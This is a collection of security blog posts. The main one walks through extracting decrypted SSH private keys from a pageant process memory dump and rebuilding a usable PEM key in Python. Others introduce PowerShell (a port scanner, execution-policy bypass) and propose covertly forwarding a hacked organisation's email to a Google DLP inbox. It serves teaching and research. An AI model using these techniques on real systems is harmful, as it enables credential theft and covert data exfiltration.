So after some fiddling around I finally found the ‘Memory64ListStream’ stream type which does contain the correct structures to access the raw memory regions I was after. The fun part is of course that after understanding all this it turned out that the dump file just contains all the raw memory regions appended to all the defined structures until the end of the file. All you need is the pointer to the start of these raw memory regions if all you wanted is access to the raw memory. Like we’ll see further down this blog post this is not wat we want, since we need to also find some specific offsets in these raw memory regions.

typedef struct _MINIDUMP_MEMORY64_LIST {
    ULONG64 NumberOfMemoryRanges;
    RVA64 BaseRva;
    MINIDUMP_MEMORY_DESCRIPTOR64 MemoryRanges [0];
} MINIDUMP_MEMORY64_LIST, *PMINIDUMP_MEMORY64_LIST;

typedef struct _MINIDUMP_MEMORY_DESCRIPTOR64 {
    ULONG64 StartOfMemoryRange;
    ULONG64 DataSize;
} MINIDUMP_MEMORY_DESCRIPTOR64, *PMINIDUMP_MEMORY_DESCRIPTOR64;

Like you can see the first structure contains the ‘BaseRva’ pointer to the raw memory regions, which you need to increment with the size of each raw memory regions if you want to read a specific region. This however I didn’t realise until I read this article even though the MSDN pages did state it:

Note that BaseRva is the overall base RVA for the memory list. To locate the data for a particular descriptor, start at BaseRva and increment by the size of a descriptor until you reach the descriptor.

If you need a quick overview of the format then the Minidump Explorer tool as well a moyix’s library do a great job of showing you the parsed file:

mde_main_window

One of the things you can for example do with the library is to extract the raw memory and write it to a file:

#!/usr/bin/env python
"""
DiabloHorn https://diablohorn.wordpress.com

Writes the raw memory from a minidump to a file
"""
import sys
import os

try:
 import minidump
except:
 print "You need the minidump library"
 print "Download http://moyix.blogspot.com.au/2008/05/parsing-windows-minidumps.html"
 sys.exit()

if __name__ == "__main__":
 if len(sys.argv) != 2:
 print "Usage %s %s" % (sys.argv[0], "<minidump_file>")
 sys.exit()

 minidump_filesize = os.path.getsize(sys.argv[1])
 rawmemory_filename = "%s.rawmem" % sys.argv[1]
 print ":::minidump filesize %s" % minidump_filesize
 f = open(sys.argv[1],'rb')
 parsed_minidump = minidump.MINIDUMP_HEADER.parse_stream(f)
 f.close()

 for i in parsed_minidump.MINIDUMP_DIRECTORY:
 if i.StreamType == 'Memory64ListStream':
 rawmemory_size = (minidump_filesize - i.DirectoryData.BaseRva)
 print ":::Found raw memory data stream"
 print ":::Start of raw memory %s" % i.DirectoryData.BaseRva
 print ":::Size of raw memory %s" % rawmemory_size
 print ":::Writing raw memory to %s" % rawmemory_filename
 f = open(sys.argv[1],'rb')
 f.seek(i.DirectoryData.BaseRva)
 data = f.read(rawmemory_size)
 f.close()
 f = open(rawmemory_filename,'wb')
 f.write(data)
 f.close()

Manually finding the private keys

Now that we know the minidump format, let’s see if we can find those decrypted private keys in the process’s memory. We need to know how they are stored in the first place, how else are we otherwise going to search for them in the vast amount of raw memory bytes? Let’s have a look at the source code first, since after all pageant is open source (putty git).

The decrypted key structure

My first thought was as follow:

Find the structure that holds the decrypted key values, convert it to a search pattern, search the dump file

The first file we will be looking at is ‘winpgnt.c’ which seems to contain the bulk of the code for the pageant binary. One of the things I always like to do when I have to look at source code is to just browse through the file to get a feeling for the structure of the code and how functions etc are used by the author, might sound weird for me it works. After this I started pageant locally and added a freshly generated (puttygen.exe) key. This provided me with names of the menus which you can then search for in the code. I used the ‘add key’ text, since this menu item prompted me for the private key file and the corresponding password. This search should land you somewhere here:

 case 101: /* add key */
 if (HIWORD(wParam) == BN_CLICKED ||
 HIWORD(wParam) == BN_DOUBLECLICKED) {
 if (passphrase_box) {
 MessageBeep(MB_ICONERROR);
 SetForegroundWindow(passphrase_box);
 break;
 }
 prompt_add_keyfile();

Now if you follow that ‘prompt_add_keyfile()’ function and then the ‘add_keyfile()’ function in it, you should eventually land on line 560 ‘skey = ssh2_load_userkey(filename, passphrase, &error);’ in the winpgnt.c file. Now that looks like what we are after, a function which takes our file and our passphrase and hopefully returns the decrypted key.

To look at the function in more detail we have to open the file ‘sshpubk.c‘ and go to line 570 on which we’ll find:

struct ssh2_userkey *ssh2_load_userkey(const Filename *filename,
 char *passphrase, const char **errorstr)

So it seems that this function returns a ‘ssh2_userkey’ structure, which after reading the function’s code it indeed does contain the decrypted private key in a corresponding format:

This is how the ‘ssh2_userkey’ looks like:

struct ssh2_userkey {
 const struct ssh_signkey *alg; /* the key algorithm */
 void *data; /* the key data */
 char *comment; /* the key comment */
};

Which of course isn’t much to create a signature from, let’s have a look at that ‘ssh_signkey’ structure as well:

struct ssh_signkey {
 void *(*newkey) (char *data, int len);
 void (*freekey) (void *key);
 char *(*fmtkey) (void *key);
 unsigned char *(*public_blob) (void *key, int *len);
 unsigned char *(*private_blob) (void *key, int *len);
 void *(*createkey) (unsigned char *pub_blob, int pub_len,
 unsigned char *priv_blob, int priv_len);
 void *(*openssh_createkey) (unsigned char **blob, int *len);
 int (*openssh_fmtkey) (void *key, unsigned char *blob, int len);
 int (*pubkey_bits) (void *blob, int len);
 char *(*fingerprint) (void *key);
 int (*verifysig) (void *key, char *sig, int siglen,
 char *data, int datalen);
 unsigned char *(*sign) (void *key, char *data, int datalen,
 int *siglen);
 char *name;
 char *keytype; /* for host key cache */
};

That’s a big list of pointers to functions…again not really suitable to create a signature in my opinion. This is partially due to the fact that you’d have to check all pointers and see if they end up in executable code. Seems we have to dig into the structure of how the actual private key data is really stored instead of the meta-info structures.

PE info & structures

You might now be going like ‘whoaaa but you said we would look into the actual key data structure’, yep I said that. This is the exact same process I went through when I talked to Mitchel Sahertian, since he was thinking more along the lines of:

Searching for signatures isn’t really beautiful or error proof, why don’t you just access the structures like pageant itself does? It has to have a beginning somewhere to find all the keys.

Hmm that didn’t sound bad at all, let’s see how pageant itself stores all the keys you load. One of the things that quickly becomes clear is that pageant has some functions with end with ‘234’ and if you look those up you’ll be reading through the ‘tree234.c‘ file. Can’t be any clearer, pageant is using a 2-3-4 tree for storage and retrieval of data. Yes, indeed, this is also the data structure used by pageant to store the key data. We know this because if we continue from the last line winpgnt.c:560 where ‘ssh2_load_userkey‘ was called and keep on reading to see what happens to the ‘skey’ variable we’ll end up at line winpgnt.c:687 which shows us ‘if (add234(ssh2keys, skey) != skey)‘. Now to verify that the ‘ssh2keys’ variable is indeed a 2-3-4 tree, we just search through the code and we’ll end up in the winmain function where we find ‘ssh2keys = newtree234(cmpkeys_ssh2);‘ confirming that indeed is a tree.

The ‘ssh2keys‘ variable is defined as ‘static tree234 *rsakeys, *ssh2keys;‘ of which Mitchel reminded me that it’s stored in the ‘.data’ section of a PE file and thus you can KNOW the offset of where the variable will be stored in memory as also stated by the ‘Peering inside the PE‘ article:

Just as .text is the default section for code, the .data section is where your initialized data goes. This data consists of global and static variables that are initialized at compile time. It also includes string literals. The linker combines all the .data sections from the OBJ and LIB files into one .data section in the EXE. Local variables are located on a thread’s stack, and take no room in the .data or .bss sections.

Now isn’t that nice? We actually have the starting point to the tree in which all the private key data is stored. From here we can parse the tree and extract the private key data, at least that’s the working theory. Let’s put it to the test.

From src to memory

Let’s see if we can find the data we want in the memory dump, to do that we need two things:

  • Offset to the ssh2keys variable in memory
  • Something to interpret the memory dump

For the first requirement we’ll use IDA and just load the binary into it, after some searching around, renaming functions and matching the disassembly to the src we have, we find the statically defined tree variable:

static_ssh_tree

Luckily for us it seems that pageant doesn’t support ASLR so the 00420D2C offset is perfectly usable without any fiddling to start the journey towards finding the decrypted private keys in memory.

Now that we have a starting offset we need a tool to interpret and navigate through the dump file that we have. For this we will be using WinDBG which is part of the Debugging Tools for Windows collection. Since I’m no windbg expert it’ll probably look clumsy, but for me it got the job done. Just load up the dump file into windbag using the File->Open Crash Dump option. Now that the dump file is loaded you can enable the memory view by pressing alt+5 just make it nice and big to work with, since this will be the only view we’ll be working with.

We’ll enter the offset we have into the virtual text box at the top which will present us with the the following view:

mem_start_tree

Since memory is displayed in little endian it’s kind of hard to read, so from now on we’ll change the view into ‘long hex’ which makes it easier to work with offset and view the data that we need. We will now just follow the next offset 002D1FA8 by entering it into the virtual text box, which will land us here:

mem_tree

At first it might not look like much when you land here, but if you have the tree234 implementation structures at hand it will start to make sense. The tree consists of a pointer to the first node and a comparison function. We can validate this because the second offset points into executable code. Let’s have a look at that first node:

mem_tree_node

Like you can see, this again will match the structure for a tree node. Since I had only loaded two keys into pageant there is no need for children nodes and only two elements are in use, which should match the data for our keys. Like you imagined since this is the first node in the tree, it doesn’t have any parent node. Let’s have a look at the first element:

mem_tree_element

Nice seems we are getting back to the first structures we found in the src, since this is the ssh2_userkey structure which holds the decrypted data, thus confirming this indeed is the tree that holds all the decrypted private keys. To fully confirm it we could look up the comment pointer which should contain the comment for the key that I loaded into pageant:

key_comment

I changed the view from ‘long hex’ to ‘ASCII’ and yes this is indeed the default comment as generated by puttygen.

OK, now what? Even though with this cleaner method we have a good way to enumerate all the loaded private keys we still need to extract the actual data. As for that unfinished sentence about key data structures, seems we’ll have to dig into it after all.

They key format

So let’s pick up where we left off, this is how the key data is stored in memory if you follow the “void *data” pointer:

key_data

Like we can see the struct has a variable part which doesn’t seem to be used if you use the binary downloaded from the official website. One of the things that kept me busy for some time where the first two field “int bits & int bytes” their values in the memory dump didn’t seem to match any logical size for the key or the struct. It was not until I debugged a running pageant instance with ollydbg (I usually trust binaries more than the src, you never know what a compiler might have done) that I realised that they really didn’t seem to be used, although they are present in the struct. This seemed to be confirmed by the src which also doesn’t seem to have a reference to those fields being set. I might have still missed something, so please let me know if I did.

So the only thing left to figure out is the Bignum type which seems pretty well commented in the ‘sshbn.c‘ src:

/*
 * The Bignum format is an array of `BignumInt'. The first
 * element of the array counts the remaining elements. The
 * remaining elements express the actual number, base 2^BIGNUM_INT_BITS, _least_
 * significant digit first. (So it's trivial to extract the bit
 * with value 2^n for any n.)
 *
 * All Bignums in this module are positive. Negative numbers must
 * be dealt with outside it.
 *
 * INVARIANT: the most significant word of any Bignum must be
 * nonzero.
 */

The ‘BignumInt’ itself, if I’m not mistaken is defined in ‘sshbn.h‘ as:

#elif defined __GNUC__ && defined __i386__
typedef unsigned long BignumInt;

So it seems that the our numbers stored as an array of four byte elements and the first element of the array tells us how many other elements are left to read, which seems to be about right if we have a look at for example the ‘private_exponent‘ struct member in windbg:

key_bignum2

 

Now that, that’s clear let’s have a look at turning this information into usable private keys which we can actually use to authenticate against servers.

Creating usable private keys

So before we just dive blindly into this, let’s think about it:

  • We have the primitives used for RSA operations
    • They where obtained from a key file format
  • We need a key file format again

Heh, that sounds funny put into perspective like that. My first thought was to just produce a putty file again, we began our journey on Windows with pageant after all right? The format if you are wondering is described in the file ‘sshpubk.c‘ starting on line 378.

Then again why not put it into a more universal format like the OpenSSH one:

-----BEGIN RSA PRIVATE KEY-----
all kind of base64 encoded data
-----END RSA PRIVATE KEY-----

At least with this format a lot of tools are able to work with it, which in the end run is just what we need if we want to use the keys to start plundering servers, sort of speak. This however is not something that you want to do manually, since it turns out that the base64 encoded data contains a DER (or BER) encoded ASN.1 structure. If you want to visualise this you can use this online ASN.1 decoder which accepts the base64 encoded form of the key and then generates a hierarchical structures side by side with the hex dump.

Luckily for us pycrypto exists which makes it a lot easier to create workable private keys from the primitives that we have, since it has a function which accepts those primitives and does all the hard work for us:

Construct an RSA key object from a tuple of valid RSA components.

See RSAImplementation.construct.

Parameters:
 tup (tuple) - A tuple of long integers, with at least 2 and no more than 6 items. The items come in the following order:

 RSA modulus (n).
 Public exponent (e).
 Private exponent (d). Only required if the key is private.
 First factor of n (p). Optional.
 Second factor of n (q). Optional.
 CRT coefficient, (1/p) mod q (u). Optional.
Returns:
 An RSA key object (_RSAobj).

Using this is relatively simple, since all we have to do is extract the hex values from the memory locations we talked about before, be careful of endianness and feed those values to the function like this:

#!/usr/bin/env python
"""
DiabloHorn https://diablohorn.wordpress.com

Converts rsa primitives extracted with windbg from memory
to a workable rsa private key format
"""
import sys
import base64
from Crypto.PublicKey import RSA

def string_to_long(data):
	data = data.split(' ')
	data.reverse()
	return long(("".join(data)),16)

if __name__ == "__main__":
	#setup the primitives
	rsamod = string_to_long('7955549b 79eb3c32 ee6e6b2c 405d4cfb c22ae82b a467ac7b 0f5875bb 5fec483b 72b26f8a 8c27373f a1abcfff d142c88a 88564e3b 1c45d0c4 53535ca6 72695f43 6fdde462 32741a1f ff1e0440 219fffea 04beaa49 73308e60 2a3e7ba6 644f51ba 8a4ddf2d 1fe2ba37 e7bcf094 adf5a610 3845feb6 2349edf5 2eb40451 e0ed9d03 923a0a70 e835a702 b0d4887b a20493ed 17c55930 29b672c9 167dc521 80327c02 daf9b3fe f3c39157 cffb8360 96c5d8db 670e1092 6d4e9f0d 2f517912 d42b8ce1 6fea58d5 7038f788 115a1eaa e5963585 7cdcd082 64d0a88c 66a4a66f fa3648ae c2fb89bc 099a73f7 f3292ffa ce2c2428 55da8859 ce045224 6190274f b1652f29')
	rsapubexp = long(0x25)
	rsaprivexp = string_to_long('a396f24d 8fd800ec 6dc00c2e abcd8943 a98f0d92 217299a8 a1ba8dcf c5b87820 96373ebe 76c0a795 92340c3b 05651d18 9ccf90bc 108c2ab3 329fc033 d36e9837 c3f7e413 22c62633 7b854536 acbd5c31 cbe7c3a3 a292eb62 b5c4146d 9f55ffa6 5d241da1 608fcce7 d2de7859 b76b703a c9960358 734329ad 13781aec 3af1eb80 fdf94703 5ac52b0f 9b12eee4 5064b34a 600635f8 c900a55c 65deff1b 41e51bca 8df3ce28 a9a3daa3 ec869e81 699101cc a95ecf9d 2b26323b e95fefd1 8154eba7 3b2c20ea 18d5c879 00b34a20 c05b4199 46051d66 69393345 a21b3f56 0fe84abb a35d2060 61fdf275 7f9f0c85 cf556a67 c478d31a dd0a8a02 1a640542 94a0e253')

	rawkey = (rsamod,rsapubexp,rsaprivexp)
	#construct the desired RSA key
	rsakey = RSA.construct(rawkey)
	#print the object, publickey, privatekey
	print rsakey
	print rsakey.publickey().exportKey('PEM')
	print rsakey.exportKey('PEM')

Like you can see I’ve been lazy and kept the windbg display format on a single line which for now works fine. With the exported private key you could now attempt to connect to any server on which this key is valid.

Finally let’s compare the keys to make sure they really are the same, I used puttygen for this since it’s nice and visual:

key_compare

On the left the key extracted from memory and imported into puttygen, like you can see it has no passphrase. On the right the original key that I imported into pageant, you might recognise the comment from earlier screenshots, when I started to write this blog post.

Conclusion

So even though at first the memory dump of a process seems like a collection of gibberish there is a lot of information you can still find in it and access in a structured way, just like how volatility makes the big pile of computer memory dumps accessible in a structured way.

Of course this exercise has been a lot easier due to the availability of pageant’s source code it’s still something that applies to a lot of processes / applications out there. For example the way that mimikatz is able to extract passwords from a LSASS process memory dump is such an example.

If however for some reasons you are not able to access the information in a structured way you could always just search for the structure in which the information is kept. In this case after obtaining a clear picture of all the structures this would certainly have been possible.

Like you can imagine there is a lot more to be extracted from the process memory dump of pageant since it contains two more interesting trees, one for other type of keys and one for short-term passwords. So if you want a nice exercise you should definitely play with it, since having the source code really is a big advantage.

Some things still left to do:

  • Automate this process with python and moyix’s library
  • Create a volatility plugin

Hope you had as much fun reading this as I had writing it and learning a lot while doing so.

References


Filed under: general, security Tagged: memory, minidump, pageant, rsa key, windbg

pageant key extraction automated

$
0
0

Well this will be a rather short post since it’s about the automation of my previous blog post in which we analysed the memory dump of the pageant process and manually extracted unencrypted keys. You can find the tool which automates this process in pageant_xkeys git repository. Since I’m a firm believer that you learn best from mistakes and old code, the repository also includes some of the other code I was playing around with.

 


Filed under: general Tagged: capstone, memory dump, pageant, pycrypto

PowerShell overview and introduction

$
0
0

This is a long overdue post I was planning on writing as a reference for myself, since I don’t write that much PowerShell. Depending on your own knowledge about powershell you can just skip to whatever sections seems useful to you. Also feel free to correct any mistakes in this article since I intent it mostly as a basic reference :) The resource section contains a nice collection of links to other PowerShell articles & tools, which means you can consider this article a small recap of all the resources linked.

TL;DR The resource section contains useful URLs to learn Power Shell, the blog post itself is just a micro-recap of those resources.

  • What is PowerShell and why would you use it?
  • Basic PowerShell environment
  • How do you run PowerShell?
  • What is the PowerShell syntax?
  • Our first script
  • Calling Windows functions
  • Resources

basic-powershell-commands-intro-840x420

What is PowerShell and why would you use it?

PowerShell is the “new” scripting language for the Windows operating system. It’s build upon the .NET framework and fully object orientated. Even the output is an object which means that the text you see on screen is usually only a subset of what the object is made of. This might need some getting used to, but in the end it’s well worth the effort. You could compare it to bash under linux, but in my opinion it’s much more powerful.

One of the reasons is because it’s so tightly integrated with a lot of Windows components and Windows itself, which makes it the perfect language to perform administration on Windows. Like we all know when hacking Windows networks a lot of times you are mainly performing administration tasks or obtaining access by abusing administrative workflows.

Like you can read the main reason to want to use PowerShell is the fact that it’s fully integrated into the operating system. That means that in theory you don’t need to introduce any foreign executables onto a system and you could perform all your actions in an obfuscated and in-memory only way.

Basic PowerShell environment

Even though PowerShell is integrated into the operating system it’s still pretty useful to understand the basic PowerShell environment as well as how to get around with the build in help. After all, how unlikely it may seem, sometimes you won’t have access to internet and you will need to handle yourself in PowerShell without it.

So just like linux one of the most helpful commands is ‘man’, jup that works just like ‘alias’. Kid you not!

man alias
alias | findstr "help"

Those commands just work under PowerShell and are more or less the basics of starting out. However we still need a way to list like almost all possible commands under PowerShell. You can more or less achieve this by doing:

Get-Help *

Since everything is an object you might want to know what the members or methods available are for an object. You can use Get-Member for this:

(dir)[0] | Get-Member

That might look like gibberish, but it translates to “get the first object from the result of the dir command”, parentheses are there to indicate order and the “[0]” notation is the usual array accessing one. If you are wondering how to figure the above out, it would be by reading the following:

man Get-Help
man Get-Member
man about_arrays
man about_Command_Syntax

So like you can see even without internet you can get pretty far by just reading the available help. Admitted that you have to do more reading than just directly searching for the answer on google. Fun stuff you can do with simple commands is stuff like:

(dir) | foreach-object -process {$_.lastaccesstime}

Which prints out the lastaccesstime for all the objects outputted by the dir command. Which is again a reminder that with PowerShell it will mostly occur that you will see less on the screen than what the actual object holds. Which more or less makes Get-Member mandatory to really know what kind of data is available after you run a command or cmdlet.

How do you run PowerShell?

Running PowerShell is pretty straightforward if we leave the execution policy out of the equation for a moment:

powershell

 

Like you can see you can execute PowerShell code from within PowerShell or by passing your code as a command line argument to the ‘powershell.exe’ executable. You can of course also execute code which resides in a separate file, a script file if you will:

[cmd.exe]
powershell.exe -File test.ps1

[powershell prompt]
.\test.ps1

Which will probably give you a big nasty ugly error about the execution policy. Before we even start bypassing the execution policy, let’s first check it out. Copy pasting directly from Microsoft they say the following:

    The execution policy is not a security system that restricts user actions.
    For example, users can easily circumvent a policy by typing the script
    contents at the command line when they cannot run a script. Instead, the
    execution policy helps users to set basic rules and prevents them from
    violating them unintentionally.

Well that at least creates the right expectations. Seems that the execution policy is certainly not intended to prevent anyone from running scripts on purpose, only by accident. This is also very visible if you search around for ‘execution policy bypass’ in which the first hit is actually a pretty great article which depicts 15 ways in which you can bypass the execution policy.

An important note with the whole execution policy bypass thing is not to forget about the PowerShell scope, since this can sometimes be the difference between the bypass working or not working. Microsoft makes it really easy to understand the correct situation vs precedence situation:

        - Group Policy: Computer Configuration
        - Group Policy: User Configuration
        - Execution Policy: Process (or PowerShell.exe -ExecutionPolicy)
        - Execution Policy: CurrentUser
        - Execution Policy: LocalMachine

Always make sure to try the most narrow scope before you give up on a execution policy bypass tricks :-)

What is the PowerShell syntax

This is just something of personal preference, but I always like to at least have somewhat of a notion of the language’s syntax before I just start out trying stuff. Also like explained at the beginning of my blog post, everything is a recap from the resources linked in this article. If you want a more extensive explanation make sure you check the resource section or the link previously mentioned.

semi colons

Those are not needed to terminate statements. You can however use them to separate statements on the command line

escape character

The backtick (grave accent) represented as the character ` is the escape character within PowerShell. You can use this character to for example print tabs `t or escape characters with a special meaning like the $ character as in `$ or escaping quotes like `”.

You can also use the backtick character to span your statements over multiple lines, which can sometimes come in handy.

variables

Variables in PowerShell have a ‘$’ sign in front of them, like:

$myvar = 'some value'
$myothervar = 42

single & double quotes

There actually is a distinction when using these. The single quote represents everything literally, the double quotes interprets what’s inside it.

$dummyvalue = 'dummy'
write 'test$dummyvalue'
write "test$dummyvalue"

The first one will print ‘test$dummyvalue’ the second one will print ‘testdummy’. And like most scripting language you can use the quotes to encapsulate each other like “soo he said ‘wow’, jus he did”.

brackets and colons/periods

The round brackets, parenthesis, ‘(‘ and ‘)’ can be used to specify order and to pass arguments to .NET methods. When calling function you defined in PowerShell you pass the arguments SPACE separated and without parenthesis since they could cause an error.

The square brackets can be used to access list/array members like most languages:

$test = 1,2,3,4,5
write $test[0]

The above will produce the output ‘1’ since it’s accessing the first members in the array. The other use case for these brackets is to define types and accessing .NET classes as in:

$test = [DateTime]
write $test::now

The above will print the current date time. Like you can see here you can use a double colon to access properties of a class, to access methods you can use the period character

$test = New-Object System.datetime
write $test
write $test.AddYears(2015)

Which doesn’t do that much except print the year 2016 and demonstrate how to access methods.

Functions

So there is an important distinctions between calling functions and calling methods. Functions in PowerShell use spaces for the parameters and not brackets, which you might confuse in the beginning when you mix in calls to methods.

We could go on endlessly about all the syntax, but usually for me this is the basics. The other stuff you can read from the linked ‘PowerShell syntax’ section in the resource section or google around for it. you might be thinking YOU FORGOT CONTROL FLOW stuff, but those don’t really vary that much from other languages :)

Our first script

As usually advised in the infosec community, learning by doing teaches best. Let’s write some useful scripts to learn a bit more about PowerShell scripting. Try to understand them and google the unknown bits =)

Portscanner

[CmdletBinding()]
Param(
		[Parameter(Mandatory=$true)][string]$myhost,
		[int[]]$myports=(80,443)
	 )

#Simple port scanner example
#DiabloHorn - https://diablohorn.wordpress.com

foreach($myport in $myports){
	try{
		$scanner = New-Object System.Net.Sockets.TcpClient($myhost,$myport)
		#returns if it's connected
		Write-Output "$myhost`t$myport`t$TRUE"
		$scanner.Close()
	}catch{
		#any exception will pretend the port was closed
		Write-Output "$myhost`t$myport`t$FALSE"
	}
}

 

Calling Windows functions

One of the main advantages of PowerShell in my opinion is the fact that besides fully integrating with the .NET framework you are also able to call native win32 API functions. This adds the benefit that you can do a lot of cool stuff and also perform a large part of that cool stuff in memory only. As an example the following code calls the MessageBox win32 API:


$c_sharp_code = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MessageBox(IntPtr hWnd, String text, String caption, int options);
'@
#Write-Output $c_sharp_code
$user32dll = Add-Type -MemberDefinition $c_sharp_code -Name 'User32' -Namespace 'Win32' -PassThru
#Write-Output $user32dll
$user32dll::MessageBox(0,"hello from powershell","PS Hello",0)

The actual explanation for the above can be found in the resource section under “Accessing Windows API”. For now the most important bit to know is that PowerShell actually in-memory compiles the code into a class which you can then just use, this is called Platform Invoke (P/INVOKE) calls for unmanaged functions. This is the supported method as far as I know and the one a lot of examples uses. The draw back can be however that some disk interaction takes place, so if you want to fully remain in memory you’d have to lookup the methods described by Matt Graeber which remain fully in memory, they are referenced in an excellent blog post by harmj0y in the resource section of this blog.

Resources

This section contains more or less all the resources I’ve used in the past when learning PowerShell and each and every time I need to refresh my memory on the topic, since I don’t write PowerShell that often. Feel free to leave additional useful resources in the comments :)


Filed under: general Tagged: powershell

Idea: Abusing Google DLP for NSA-style content searching

$
0
0

Errr ok, so the “NSA-style content searching” might be a bit overrated then again it’s usually only the intelligence agencies which perform this type of bulk searches as far as I know. Anyhow, here is an idea on how to abuse Google DLP (available in google apps for work) to perform exactly the same, since it recently incorporated support to also perform OCR on the emails / attachments:

According to this screenshot it seems that you can also perform DLP actions on incoming items:

google-dlp

Which is what enables us to perform specific content searches on all incoming email messages and prepend  certain keywords to the subject. Now imagine you just hacked an organisation and added a rule to the exchange server or individual outlook instances to forward all email to an email your control and has DLP enabled with all the keywords, hashes or rules you need to only get the juicy contents out? Don’t forget to delete the forwarded message with a rule ;) The types of content matching that you can perform is also pretty flexible:

  • Pattern match—A specific alphanumeric pattern (not just string length), including delimiters, valid position, and valid range checks
  • Context—Presence of relevant strings in proximity to pattern and/or checksum matching string
  • Checksum—Checksum computation and verification with check digit
  • Word/phrase list—Full or partial match to an entry found in a dictionary of words and phrases

Based on the DLP trigger you can then just rename the subject and use google rules to forward the message to another inbox or leave it there and just organise it into folders. Kinda saves you as an attacker a lot of time, since normally you’d have to perform or implement OCR / content matching yourself. Added bonus is that since it’s already been stolen from the victim company it doesn’t really matter what you do with it as long as the original sender doesn’t receive some weird Google notification.

You might be thinking “my client will never allow this”, but what if your client is already connected to google apps for work?

As a final thought you could also use this for defence purposes if you are already working with Google apps for work as an organisation. You could use the Google DLP feature to feed it the currently hyped ‘threat intelligence’ file hash information and block different known threat actors if their tools & techniques remain the same for a period of time.


Filed under: general Tagged: content search, dlp, exchange, google, intel, nsa, outlook

[python] Poor man’s forensics

$
0
0

So after a period of ‘lesser technical times’ I finally  got a chance to play around with bits, bytes and other subjects of the information security world.  A while back I got involved in a forensic investigation and participated with the team to answer the investigative questions.  This was an interesting journey since a lot of things peeked my interest or ended up on one of my todo lists.

One of the reasons that my interest was peeked is that yes, you can use a lot of pre-made tools to process the disk images and after that processing is done you can start your investigation. However, there are still a lot of questions you could answer much quicker if you had a subset of that data available ‘instantly’. The other reason is that not all the tools understand all the filesystems out there, which means that if you encounter an exotic file system your options are heavily reduced. One of the tools I like and which inspired me for these quick & dirty scripts is ‘mac-robber‘ (be aware that it changes file times if the destination is not mounted read-only) since it’s able to process any file system as long as it’s mounted on an operating system on which mac-robber is able to run. An example of running mac-robber:

sudo mac-robber mnt/ | head
class|host|start_time
body|devm|1471229762
MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime
0|mnt/.disk|0|dr-xr-xr-x|0|0|2048|1461191363|1461191353|1461191353|0
0|mnt/.disk/base_installable|0|-r–r–r–|0|0|0|1461191363|1461191316|1461191316|0
0|mnt/.disk/casper-uuid-generic|0|-r–r–r–|0|0|37|1461191363|1461191353|1461191353|0

You can even timeline the output if you want with mactime:

sudo mac-robber mnt/ | mactime -d | head
Date,Size,Type,Mode,UID,GID,Meta,File Name
Thu Jan 01 1970 01:00:00,2048,…b,dr-xr-xr-x,0,0,0,”mnt/.disk”
Thu Jan 01 1970 01:00:00,0,…b,-r–r–r–,0,0,0,”mnt/.disk/base_installable”
Thu Jan 01 1970 01:00:00,37,…b,-r–r–r–,0,0,0,”mnt/.disk/casper-uuid-generic”
Thu Jan 01 1970 01:00:00,15,…b,-r–r–r–,0,0,0,”mnt/.disk/cd_type”
Thu Jan 01 1970 01:00:00,60,…b,-r–r–r–,0,0,0,”mnt/.disk/info”

Now that’s pretty useful and quick! One of the things I missed however was the ability to quickly extend the tools as well as focus on just files. From a penetration testing perspective I find files much more interesting in an forensic investigation than directories and their meta-data. This is of course tied to the type of investigation you are doing, the goal of the investigation and the questions you need answered.

I decided to write a mac-robber(ish) python version to aid me in future investigations as well as learning a thing or two along the way. Before you continue reading please be aware that:

  1. The scripts have not gone through extensive testing
  2. Thus should not be blindly trusted to produce forensically sound output
  3. The regular ‘professional’ tools are not perfect either and still contain bugs ;)

That being said, let’s have a look at the type of questions you can answer with a limited set of data and how that could be done with custom written tools. If you don’t care about my ramblings, just access the Github repo here. It has become a bit of a long article, so here are the ‘chapters’ that you will encounter:

  1. What data do we want?
  2. How do we get the data?
  3. Working with the data, answering questions
    1. Converting to body file format
    2. Finding duplicate hashes
    3. Permission issues
    4. Entropy / file type issues
  4. Final thoughts

What data do we want?

We can answer this question partially by looking at the standard fls tool:

  • md5
  • file type as reported in file name and metadata structure (see above)
  • Metadata Address
  • name
  • mtime (last modified time)
  • atime (last accessed time)
  • ctime (last changed time)
  • crtime (created time)
  • size (in bytes)
  • uid (User ID)
  • gid (Group ID)

The above can answer quite a lot of questions, although it would be nice to also have information like:

  • multiple hash formats
  • file entropy
  • file type (as outputted normally by the ‘file’ command)

The multiple hash formats is a nice to have since md5 should really be deprecated, the entropy is nice since it helps us to maybe find encrypted files. Which brings us into the danger region of ‘oh but this data is also nice’ behaviour, so for now we are going to settle on the following:

  • <variable hashes> (as supported by hashlib)
  • path (file path)
  • atime
  • mtime
  • ctime
  • size
  • uid
  • gid
  • permissions (octal representation)
  • permissions_h (symbolic representation)
  • inode
  • device_id
  • st_blocks
  • st_blksize
  • st_rdev
  • st_flags
  • st_gen
  • st_birthtime
  • st_ftype
  • st_attrs
  • st_obtype
  • entropy (shannon calculation)
  • type (file output)

Why the above data? Mostly because of:

  • Large part is standard to other tools as well
  • Large part is just all the output of python’s ‘os.stat’
  • Some is useful to have and avoids processing or querying the file again

How do we get the data?

I choose to use python since it’s easy to develop for and it has a lot of build in libraries. Additionally it runs on a lot of platforms if you’d ever need to run the script on a different platform. So what are some of the requirements?

  • Run on mount points
    • Focus on files only
  • Be fast
    • Avoid redoing tasks
    • Try to be disk i/o efficient
      • Read once, operate many
  • Workable output format

The reason for the requirement of the script to operate on mount points is that this way we can avoid the challenge of operating on obscure file systems. If we need to operate on an obscure file system we can just expose that file system over some kind of sharing mechanism like NFS or SMB or run the script directly on the operating system. This does of course influence how forensically accurate the data can be depending on the sharing method, but since this is just intended to answer some quick questions while the more professional tools are working we should be fine.

If what we want to achieve has to be done while other tools are retrieving more detailed data for forensics analysis, it means that our script should be as quick as possible (within the constraints of an interpreted language). For this we are going to use the multiprocessing module. The reason for this is that python threads are not really as effective as ‘real’ threads. If you are wondering why, you should read this article. The short version is that python has a ‘Global Interpreter Lock (GIL)’ which prevents python from really running different threads at the same time. Thus if we really need concurrent operations to happen we have to resort to splitting the tasks up into different processes. Another way of improving speed is of course to not redo tasks which other specialised tools can perform much faster. For example, recursively walking a directory tree could be done with find:

find / -type f > filelist.txt

Thus to avoid redoing tasks it’d be great if we could just do:

cat filelist.txt | our_script.py

